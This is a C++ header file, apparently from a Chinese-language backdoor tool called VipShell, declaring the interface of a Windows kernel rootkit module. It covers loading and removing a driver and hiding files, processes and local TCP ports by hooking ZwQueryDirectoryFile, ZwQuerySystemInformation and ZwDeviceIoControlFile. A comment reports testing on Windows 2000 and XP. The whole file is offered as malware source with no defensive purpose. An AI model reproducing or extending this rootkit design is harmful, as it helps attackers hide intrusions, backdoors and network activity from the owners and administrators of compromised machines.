i_rootkitmodule.h

VipShell驱动隐藏模块

#pragma once
#include "Pinboard.h"

//在2000 XP 下测试通过  如果谁测试了2003 告诉我下哈
struct I_RootKitModule : public  CPinboard
{
	virtual void Test() = 0; //测试接口

	virtual void CreateDriver(LPCSTR szFileName, LPCSTR szDriver) = 0;   //szFileName 驱动文件的地址 szDriver 驱动名字
	virtual bool StartDriver() = 0;  //启动驱动  一般在第一次安装的时候
	virtual bool StopDriver() = 0;   //停止驱动 （所有的HOOK 函数将停止）
	virtual bool DeleteDriver(LPCTSTR szDriver = NULL) = 0;   //删除驱动 （所有的HOOK 函数将停止）

	virtual bool AddHideFile(LPCTSTR szFile) = 0;  //添加一个隐藏文件  最多10 个
	virtual bool DelHideFile(LPCTSTR szFile) = 0;  //取消隐藏一个文件
	virtual bool StartHideFile() = 0;              //开始HOOK ZwQueryDirectoryFile

	virtual bool AddHideProcessId(DWORD dwId) = 0;        //添加 隐藏一个进程 最多10 个
	virtual bool DelHideProcessId(DWORD dwId) = 0;        //取消隐藏一个进程
	virtual bool StartHideProcess() = 0;                     //开始HOOK ZwQuerySystemInformation

	virtual bool AddHidePort(DWORD dwPort) = 0;             //隐藏一个 本地TCP端口 最多10 个
	virtual bool DelHidePort(DWORD dwPort) = 0; //delete
	virtual bool StartHidePort() = 0;                  //HOOK ZwDeviceIoControlFile
};